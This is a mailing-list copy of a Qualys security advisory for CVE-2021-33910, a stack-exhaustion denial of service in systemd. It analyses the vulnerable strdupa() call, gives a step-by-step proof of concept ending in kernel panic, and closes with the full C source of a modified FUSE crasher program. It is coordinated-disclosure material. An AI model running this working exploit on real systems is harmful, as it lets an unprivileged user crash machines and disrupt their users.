[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[oss-security] CVE-2021-33910: Denial of service (stack exhaustion) in systemd (PID 1)



Qualys Security Advisory

CVE-2021-33910: Denial of service (stack exhaustion) in systemd (PID 1)


========================================================================
Contents
========================================================================

Summary
Analysis
Proof of concept
Acknowledgments
Timeline


========================================================================
Summary
========================================================================

In 2018, while working on our exploit for CVE-2018-14634 in the Linux
kernel, we accidentally discovered CVE-2018-16864 in systemd (journald);
in our "System Down" advisory we wrote: "Surprised by the heavy usage of
alloca() in journald, we searched for another attacker-controlled
alloca() and found CVE-2018-16865".

Recently, while working on our exploit for CVE-2021-33909 in the Linux
kernel, we accidentally stumbled upon CVE-2021-33910 in systemd (PID 1),
another attacker-controlled alloca():

https://wiki.sei.cmu.edu/confluence/display/c/MEM05-C.+Avoid+large+stack+allocations

Although attackers cannot exploit this vulnerability as a "Stack Clash"
to gain privileges (because the alloca()ted buffer is fully written to),
they can exploit it to crash systemd and hence the entire operating
system (a kernel panic). Our proof of concept, a 10-line change in
FUSE's "hello world" program, is attached to this advisory and is
available at:

https://www.qualys.com/research/security-advisories/

To the best of our knowledge, this vulnerability was introduced in
systemd v220 (April 2015) by commit 7410616c ("core: rework unit name
validation and manipulation logic"), which replaced a strdup() in the
heap with a strdupa() on the stack.

Note: a similar vulnerability was discovered in 2019 by Chris Coulson
(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6454).


========================================================================
Analysis
========================================================================

systemd monitors and parses the contents of /proc/self/mountinfo, and
passes each mountpoint path to mount_setup_unit(), which passes it to
unit_name_from_path(), which passes it to unit_name_path_escape():

------------------------------------------------------------------------
1720 static int mount_load_proc_self_mountinfo(Manager *m, bool set_flags) {
....
1727         r = libmount_parse(NULL, NULL, &table, &iter);
....
1731         for (;;) {
....
1735                 r = mnt_table_next_fs(table, iter, &fs);
....
1742                 path = mnt_fs_get_target(fs);
....
1751                 (void) mount_setup_unit(m, device, path, options, fstype, set_flags);
------------------------------------------------------------------------
1644 static int mount_setup_unit(
1645                 Manager *m,
1646                 const char *what,
1647                 const char *where,
1648                 const char *options,
1649                 const char *fstype,
1650                 bool set_flags) {
....
1683         r = unit_name_from_path(where, ".mount", &e);
------------------------------------------------------------------------
512 int unit_name_from_path(const char *path, const char *suffix, char **ret) {
...
523         r = unit_name_path_escape(path, &p);
------------------------------------------------------------------------
380 int unit_name_path_escape(const char *f, char **ret) {
...
386         p = strdupa(f);
------------------------------------------------------------------------

At line 386, unit_name_path_escape() passes the mountpoint path to
strdupa(), which is similar to strdup() but allocates memory on the
stack (via alloca()), not in the heap (via malloc()).

As a result, if the total path length of this mountpoint exceeds 8MB
(the default RLIMIT_STACK), then systemd crashes with a segmentation
fault that also crashes the entire operating system (a kernel panic,
because systemd is the "global init", PID 1).


========================================================================
Proof of concept
========================================================================

- First, as an unprivileged local user, we mount a basic FUSE filesystem
  (with FUSE's "hello world" program) to /tmp/hello/world:

------------------------------------------------------------------------
$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

$ mkdir -m 0700 -p /tmp/hello/world

$ ./CVE-2021-33910-crasher /tmp/hello/world

$ grep fuse /proc/self/mountinfo | wc
      2      22     239
------------------------------------------------------------------------

- Second, we create a deep directory whose total path length exceeds 8MB
  and move our FUSE filesystem to this directory:

------------------------------------------------------------------------
$ ./CVE-2021-33910-crasher /tmp/hello/world /tmp
creating directories, please wait...

$ grep fuse /proc/self/mountinfo | wc
      2      22 8389099
------------------------------------------------------------------------

- Third, to force systemd into re-parsing /proc/self/mountinfo (which
  contains our long directory path), we mount another FUSE filesystem
  and therefore crash systemd and the entire operating system:

------------------------------------------------------------------------
$ mkdir -m 0700 -p /tmp/hello/world

$ ./CVE-2021-33910-crasher /tmp/hello/world

Kernel panic - not syncing: Attempted to kill init!
------------------------------------------------------------------------

- Alternatively, because systemd v248 occasionally fails to monitor
  /proc/self/mountinfo (https://github.com/systemd/systemd/issues/19464)
  we force systemd into auto-mounting a filesystem itself; for example,
  the binfmt_misc filesystem:

------------------------------------------------------------------------
$ systemctl -a list-units '*binfmt_misc*'
  UNIT                              LOAD   ACTIVE   SUB     DESCRIPTION
  proc-sys-fs-binfmt_misc.automount loaded active   waiting Arbitrary...
  proc-sys-fs-binfmt_misc.mount     loaded inactive dead    Arbitrary...

$ cat /proc/sys/fs/binfmt_misc/status

Kernel panic - not syncing: Attempted to kill init!
------------------------------------------------------------------------


========================================================================
Acknowledgments
========================================================================

We thank Red Hat Product Security, systemd's developers, and the members
of linux-distros@openwall for their work on this coordinated disclosure.
We also thank Mitre's CVE Assignment Team.


========================================================================
Timeline
========================================================================

2021-06-09: We sent our advisories for CVE-2021-33909 and CVE-2021-33910
to Red Hat Product Security (the two vulnerabilities are closely related
and the systemd-security mailing list is hosted by Red Hat).

2021-07-06: We sent our advisories, and Red Hat sent the patches they
wrote, to the linux-distros@openwall mailing list.

2021-07-20: Coordinated Release Date (12:00 PM UTC).

/*
  FUSE: Filesystem in Userspace
  Copyright (C) 2001-2007  Miklos Szeredi <miklos AT szeredi.hu>

  Modified by Qualys for:
  CVE-2021-33910: Denial of service (stack exhaustion) in systemd (PID 1)

  This program can be distributed under the terms of the GNU GPL.
  See the file COPYING.

  gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello
*/

#define FUSE_USE_VERSION 26

#include <fuse.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>

#include <limits.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

static const char *hello_str = "Hello World!\n";
static const char *hello_path = "/hello";

static int hello_getattr(const char *path, struct stat *stbuf)
{
    int res = 0;

    memset(stbuf, 0, sizeof(struct stat));
    if (strcmp(path, "/") == 0) {
        stbuf->st_mode = S_IFDIR | 0755;
        stbuf->st_nlink = 2;
    } else if (strcmp(path, hello_path) == 0) {
        stbuf->st_mode = S_IFREG | 0444;
        stbuf->st_nlink = 1;
        stbuf->st_size = strlen(hello_str);
    } else
        res = -ENOENT;

    return res;
}

static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
             off_t offset, struct fuse_file_info *fi)
{
    (void) offset;
    (void) fi;

    if (strcmp(path, "/") != 0)
        return -ENOENT;

    filler(buf, ".", NULL, 0);
    filler(buf, "..", NULL, 0);
    filler(buf, hello_path + 1, NULL, 0);

    return 0;
}

static int hello_open(const char *path, struct fuse_file_info *fi)
{
    if (strcmp(path, hello_path) != 0)
        return -ENOENT;

    if ((fi->flags & 3) != O_RDONLY)
        return -EACCES;

    return 0;
}

static int hello_read(const char *path, char *buf, size_t size, off_t offset,
              struct fuse_file_info *fi)
{
    size_t len;
    (void) fi;
    if (strcmp(path, hello_path) != 0)
        return -ENOENT;

    len = strlen(hello_str);
    if (offset < len) {
        if (offset + size > len)
            size = len - offset;
        memcpy(buf, hello_str + offset, size);
    } else
        size = 0;

    return size;
}

static struct fuse_operations hello_oper = {
    .getattr = hello_getattr,
    .readdir = hello_readdir,
    .open    = hello_open,
    .read    = hello_read,
};

int main(int argc, char *argv[])
{
    if (argc != 2) {
        if (argc != 3) exit(__LINE__);
        char * const mpoint = argv[1];
        if (chdir(argv[2])) exit(__LINE__);

        static char onedir[NAME_MAX + 1];
        memset(onedir, 'A', sizeof(onedir)-1);

        size_t i;
        puts("creating directories, please wait...");
        for (i = 0; i <= (1 << 23) / sizeof(onedir); i++) {
            if (mkdir(onedir, S_IRWXU)) exit(__LINE__);
            if (chdir(onedir)) exit(__LINE__);
        }

        char * const rslash = strrchr(mpoint, '/');
        if (!rslash) exit(__LINE__);
        *rslash = '\0';

        if (rename(mpoint, "./A")) exit(__LINE__);
        exit(EXIT_SUCCESS);
    }

    return fuse_main(argc, argv, &hello_oper, NULL);
}